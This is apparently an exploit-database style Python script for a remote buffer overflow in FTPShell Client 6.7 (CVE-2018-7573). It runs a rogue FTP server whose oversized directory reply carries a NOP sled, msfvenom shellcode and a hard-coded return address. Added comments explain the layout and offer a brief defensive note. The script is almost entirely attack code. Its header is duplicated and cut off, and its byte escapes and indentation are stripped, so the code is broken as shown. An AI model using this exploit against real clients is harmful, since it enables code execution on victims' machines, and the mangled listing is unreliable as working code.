# -*- coding: utf-8 -*-

# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow
# Date: 2018-01-03
# Exploit Author: Sebastián Castro @r4wd3r
# Vendor Hom # -*- coding: utf-8 -*-

# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow
# Date: 2018-01-03
# Exploit Author: Sebastián Castro @r4wd3r
# Vendor Homepage: http://www.ftpshell.com/index.htm
# Software Link: http://www.ftpshell.com/download.htm
# Version: 6.7
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows XP SP3 x86.
# CVE : CVE-2018-7573

import socket
import sys

# TCP port the rogue FTP listener binds to. The vulnerable client is the
# party that connects here; this script is the server side of the exchange.
port: int = 21

# Shellcode emitted by msfvenom (command line kept below). As rendered in this
# listing the "\x" escape backslashes appear to have been lost (compare the -b
# argument with what msfvenom normally takes), so these literals are plain
# ASCII text rather than the intended bytes and the script is not runnable
# as shown.
# msfvenom -p windows/exec CMD=calc.exe -f python -b 'x00x22x0dx0a'
buf: str = ""
buf += "xdbxc8xbax3ex93x15x8fxd9x74x24xf4x5ex33"
buf += "xc9xb1x31x31x56x18x03x56x18x83xc6x3ax71"
buf += "xe0x73xaaxf7x0bx8cx2ax98x82x69x1bx98xf1"
buf += "xfax0bx28x71xaexa7xc3xd7x5bx3cxa1xffx6c"
buf += "xf5x0cx26x42x06x3cx1axc5x84x3fx4fx25xb5"
buf += "x8fx82x24xf2xf2x6fx74xabx79xddx69xd8x34"
buf += "xdex02x92xd9x66xf6x62xdbx47xa9xf9x82x47"
buf += "x4bx2exbfxc1x53x33xfax98xe8x87x70x1bx39"
buf += "xd6x79xb0x04xd7x8bxc8x41xdfx73xbfxbbx1c"
buf += "x09xb8x7fx5fxd5x4dx64xc7x9exf6x40xf6x73"
buf += "x60x02xf4x38xe6x4cx18xbex2bxe7x24x4bxca"
buf += "x28xadx0fxe9xecxf6xd4x90xb5x52xbaxadxa6"
buf += "x3dx63x08xacxd3x70x21xefxb9x87xb7x95x8f"
buf += "x88xc7x95xbfxe0xf6x1ex50x76x07xf5x15x88"
buf += "x4dx54x3fx01x08x0cx02x4cxabxfax40x69x28"
buf += "x0fx38x8ex30x7ax3dxcaxf6x96x4fx43x93x98"
buf += "xfcx64xb6xfax63xf7x5axd3x06x7fxf8x2b"

# Listener setup. Binding to 0.0.0.0 exposes the rogue server on every
# interface of the host running it. The bare except swallows every error
# (e.g. port 21 already in use or not permitted): the failure is only
# printed and execution continues, so the later s.accept() raises NameError
# because s was never bound. The bodies of try/except (and of the while
# loop below) are shown without indentation, so the listing does not parse
# as-is; presumably another extraction artifact.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[+] FTP server started on port: "+str(port)+" ")
except:
print("[x] Failed to start the server on port: "+str(port)+" ")

# Overflow layout: 40 NOPs, the shellcode, "F" padding up to 400 bytes, then
# the three-byte return address (the low bytes of 0x00452eed, little-endian).
# The return address is a fixed location inside FTPShell.exe itself, which
# suggests the module was not ASLR-randomised (inferred from the hard-coded
# address; a rebased or /DYNAMICBASE build would break this).
eip: str = "xedx2ex45" # CALL ESI from FTPShell.exe : 0x00452eed
nops: str = "x90"*40
junk: str = "F"*(400 - len(nops) - len(buf))
payload: str = nops + buf + junk + eip

# Minimal fake FTP dialogue: greet, answer whatever the client sends with
# 331 and then 230 (any USER/PASS is accepted), then reply to the client's
# next command with a 220 line whose quoted "directory" is the ~404-byte
# payload. Per the exploit title this oversized reply is what the vulnerable
# client mishandles (CVE-2018-7573). Each recv() result is echoed to stdout
# so the operator can see the client's commands. Every reply ends in a space
# where an FTP "\r\n" terminator would be expected, consistent with the
# stripped escapes noted above. Sending str objects over the socket implies
# Python 2. Accepted connections are never closed, and the server does not
# wait for the client to acknowledge the final reply.
# Defender's view: a server reply hundreds of bytes long, or a quoted path
# containing non-printable bytes, is never legitimate FTP and is easy to flag
# on the wire; the durable fix is the vendor's patched client plus not
# pointing clients at untrusted FTP servers.
while True:
conn, addr = s.accept()
conn.send('220 FTP Server ')
print(conn.recv(1024))
conn.send("331 OK ")
print(conn.recv(1024))
conn.send('230 OK ')
print(conn.recv(1024))
conn.send('220 "'+payload+'" is current directory ')